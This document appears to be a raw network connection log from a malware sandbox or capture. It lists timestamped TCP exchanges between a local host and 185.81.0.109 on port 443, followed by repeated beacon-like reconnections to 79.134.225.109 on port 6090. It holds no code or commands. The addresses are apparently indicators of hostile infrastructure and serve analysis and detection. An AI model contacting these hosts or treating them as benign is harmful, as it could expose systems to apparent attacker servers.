Apr 1, 2021 17:43:52.017914057 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.017932892 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.017951012 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.017966986 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.017982960 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.017998934 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018013954 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018081903 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018099070 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018114090 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018129110 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018145084 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018158913 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018174887 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018189907 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018208981 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018225908 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018243074 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018260002 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018275976 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018328905 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018347979 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018364906 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018503904 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018518925 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018534899 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018549919 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018568039 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018585920 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018599987 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018615961 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018675089 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018688917 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018707991 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018726110 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018740892 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018802881 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018819094 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018834114 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018852949 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018968105 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.018990040 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019007921 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019023895 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019038916 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019057035 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019078016 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019089937 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019105911 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019193888 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019210100 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019224882 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019241095 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019254923 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019270897 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019383907 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019399881 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019414902 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019429922 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019443989 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019459963 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019489050 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019505024 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019520998 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019622087 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019639015 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019650936 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019666910 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019705057 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019723892 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019740105 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019754887 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019865036 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019881010 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019896984 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019915104 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019952059 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019968033 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.019983053 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.021042109 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:52.021119118 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:52.021152973 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:52.021190882 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:52.021225929 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:52.021262884 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:52.021301985 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:52.021346092 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:52.081434965 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.081470013 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.081496000 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.081521034 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.081538916 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:52.081546068 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.081571102 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.081585884 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:52.081594944 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.081619024 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.081645966 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.081675053 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.081680059 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:52.081696987 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.081721067 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.081722021 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:52.081744909 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.081749916 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:52.081767082 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.081792116 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.081813097 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.081836939 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:52.081837893 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:52.081883907 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:52.430349112 CEST	49791	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:52.539498091 CEST	6090	49791	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:53.018729925 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:53.018753052 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:53.018820047 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:53.018865108 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:53.141539097 CEST	49791	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:53.250452042 CEST	6090	49791	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:53.362309933 CEST	49792	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:53.467542887 CEST	6090	49792	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:54.141539097 CEST	49792	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:54.249524117 CEST	6090	49792	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:54.845406055 CEST	49792	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:54.951761007 CEST	6090	49792	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:55.065661907 CEST	49793	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:55.171444893 CEST	6090	49793	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:55.690535069 CEST	49793	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:55.796755075 CEST	6090	49793	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:56.297980070 CEST	49793	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:56.403280020 CEST	6090	49793	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:56.534987926 CEST	49794	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:56.643264055 CEST	6090	49794	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:57.151782036 CEST	49794	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:57.260452032 CEST	6090	49794	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:57.766901016 CEST	49794	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:57.875122070 CEST	6090	49794	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:58.005909920 CEST	49795	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:58.113750935 CEST	6090	49795	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:58.626339912 CEST	49795	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:58.784547091 CEST	6090	49795	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:59.298274994 CEST	49795	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:59.404369116 CEST	6090	49795	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:59.536041021 CEST	49796	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:59.643091917 CEST	6090	49796	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:00.157731056 CEST	49796	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:00.264043093 CEST	6090	49796	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:00.767157078 CEST	49796	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:00.872447968 CEST	6090	49796	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:01.786145926 CEST	49797	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:01.892047882 CEST	6090	49797	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:02.497713089 CEST	49797	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:02.604398966 CEST	6090	49797	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:03.236088991 CEST	49797	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:03.345503092 CEST	6090	49797	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:03.457803011 CEST	49798	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:03.569684982 CEST	6090	49798	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:04.236279011 CEST	49798	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:04.344440937 CEST	6090	49798	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:04.845664978 CEST	49798	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:04.955533981 CEST	6090	49798	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:05.068582058 CEST	49799	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:05.176954985 CEST	6090	49799	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:05.689368010 CEST	49799	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:05.797483921 CEST	6090	49799	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:06.298819065 CEST	49799	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:06.405531883 CEST	6090	49799	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:06.521318913 CEST	49800	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:06.632137060 CEST	6090	49800	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:07.142748117 CEST	49800	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:07.252269030 CEST	6090	49800	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:07.767792940 CEST	49800	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:07.875848055 CEST	6090	49800	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:07.993710995 CEST	49801	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:08.104975939 CEST	6090	49801	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:08.611751080 CEST	49801	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:08.720132113 CEST	6090	49801	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:09.221024036 CEST	49801	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:09.330775976 CEST	6090	49801	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:09.442658901 CEST	49802	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:09.548399925 CEST	6090	49802	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:10.049273968 CEST	49802	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:10.155931950 CEST	6090	49802	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:10.659075975 CEST	49802	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:10.764844894 CEST	6090	49802	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:10.893269062 CEST	49803	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:11.000040054 CEST	6090	49803	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:11.502479076 CEST	49803	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:11.608350039 CEST	6090	49803	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:12.111845016 CEST	49803	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:12.217571020 CEST	6090	49803	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:12.332662106 CEST	49804	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:12.442986012 CEST	6090	49804	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:12.955661058 CEST	49804	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:13.063735962 CEST	6090	49804	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:13.565078974 CEST	49804	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:13.677551031 CEST	6090	49804	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:13.787575006 CEST	49805	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:13.895086050 CEST	6090	49805	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:14.409149885 CEST	49805	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:14.515012026 CEST	6090	49805	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:15.018508911 CEST	49805	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:15.124161959 CEST	6090	49805	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:15.241209030 CEST	49806	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:15.349777937 CEST	6090	49806	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:15.863627911 CEST	49806	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:15.971982002 CEST	6090	49806	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:16.489027023 CEST	49806	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:16.597510099 CEST	6090	49806	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:16.708218098 CEST	49807	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:16.814266920 CEST	6090	49807	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:17.315566063 CEST	49807	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:17.421462059 CEST	6090	49807	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:17.924983025 CEST	49807	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:18.030853987 CEST	6090	49807	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:18.154233932 CEST	49808	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:18.262963057 CEST	6090	49808	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:18.768668890 CEST	49808	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:18.877758026 CEST	6090	49808	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:19.393769026 CEST	49808	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:19.502293110 CEST	6090	49808	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:20.155293941 CEST	49809	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:20.261606932 CEST	6090	49809	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:20.768897057 CEST	49809	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:20.877445936 CEST	6090	49809	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:21.378323078 CEST	49809	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:22.704051971 CEST	6090	49809	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:22.819333076 CEST	49810	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:22.925816059 CEST	6090	49810	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:23.018974066 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:44:23.425286055 CEST	49810	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:23.531811953 CEST	6090	49810	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:24.034765959 CEST	49810	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:24.142990112 CEST	6090	49810	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:24.271080971 CEST	49811	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:24.377253056 CEST	6090	49811	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:24.878662109 CEST	49811	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:24.984244108 CEST	6090	49811	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:25.488084078 CEST	49811	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:25.594428062 CEST	6090	49811	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:25.710206985 CEST	49812	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:25.818295002 CEST	6090	49812	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:26.331826925 CEST	49812	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:26.442164898 CEST	6090	49812	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:26.956939936 CEST	49812	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:27.071769953 CEST	6090	49812	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:27.176989079 CEST	49813	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:27.283866882 CEST	6090	49813	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:27.785073042 CEST	49813	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:27.890734911 CEST	6090	49813	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:28.394500971 CEST	49813	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:28.500349998 CEST	6090	49813	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:28.616507053 CEST	49814	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:28.727241039 CEST	6090	49814	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:29.238267899 CEST	49814	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:29.350971937 CEST	6090	49814	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:29.863363028 CEST	49814	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:29.974252939 CEST	6090	49814	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:30.084239960 CEST	49815	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:30.190154076 CEST	6090	49815	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:30.691694975 CEST	49815	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:30.797442913 CEST	6090	49815	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:31.301114082 CEST	49815	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:31.410881042 CEST	6090	49815	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:31.522238970 CEST	49816	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:31.630460978 CEST	6090	49816	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:32.145128965 CEST	49816	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:32.251203060 CEST	6090	49816	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:32.754218102 CEST	49816	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:32.864609957 CEST	6090	49816	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:32.975456953 CEST	49817	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:33.086138964 CEST	6090	49817	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:33.598057985 CEST	49817	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:33.708678007 CEST	6090	49817	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:34.223191023 CEST	49817	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:34.331568956 CEST	6090	49817	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:34.445137024 CEST	49818	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:34.554065943 CEST	6090	49818	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:35.066967010 CEST	49818	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:35.177767992 CEST	6090	49818	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:35.692236900 CEST	49818	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:35.800966024 CEST	6090	49818	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:35.912770987 CEST	49819	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:36.021375895 CEST	6090	49819	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:36.535739899 CEST	49819	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:36.644499063 CEST	6090	49819	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:37.145345926 CEST	49819	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:37.250929117 CEST	6090	49819	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:37.365669012 CEST	49820	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:37.476008892 CEST	6090	49820	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:37.989125013 CEST	49820	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:38.101514101 CEST	6090	49820	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:38.614213943 CEST	49820	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:38.724065065 CEST	6090	49820	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:38.835278988 CEST	49821	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:38.941061020 CEST	6090	49821	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:39.442217112 CEST	49821	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:39.548163891 CEST	6090	49821	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:40.051851034 CEST	49821	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:40.159739971 CEST	6090	49821	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:40.274199009 CEST	49822	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:40.381246090 CEST	6090	49822	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:40.895600080 CEST	49822	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:41.003746033 CEST	6090	49822	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:41.505173922 CEST	49822	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:41.610889912 CEST	6090	49822	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:41.725573063 CEST	49823	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:41.832735062 CEST	6090	49823	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:42.333164930 CEST	49823	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:42.437796116 CEST	6090	49823	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:42.942584038 CEST	49823	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:43.048718929 CEST	6090	49823	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:43.179111958 CEST	49824	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:43.285027027 CEST	6090	49824	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:43.802551031 CEST	49824	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:43.908230066 CEST	6090	49824	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:44.411526918 CEST	49824	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:44.519840002 CEST	6090	49824	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:44.632704973 CEST	49825	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:44.740159035 CEST	6090	49825	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:45.255235910 CEST	49825	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:45.360197067 CEST	6090	49825	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:45.864948034 CEST	49825	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:45.971524954 CEST	6090	49825	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:46.086011887 CEST	49826	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:46.193286896 CEST	6090	49826	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:46.708566904 CEST	49826	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:46.814575911 CEST	6090	49826	79.134.225.109	192.168.2.3
